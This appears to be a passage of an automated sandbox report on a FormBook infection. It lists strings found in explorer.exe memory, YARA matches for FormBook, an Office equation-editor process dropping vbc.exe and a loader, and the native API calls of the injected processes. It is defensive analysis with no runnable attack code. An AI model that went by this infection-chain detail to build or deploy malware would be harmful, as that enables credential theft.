          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2151311549.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2160820434.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2151585169.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181CE NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A10D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A01D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181CE NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183AB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F800C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F807AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F801D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F81148 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F8010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F810D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F80078 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F80060 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F80048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F81930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F81D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FD5C NtEnumerateKey,
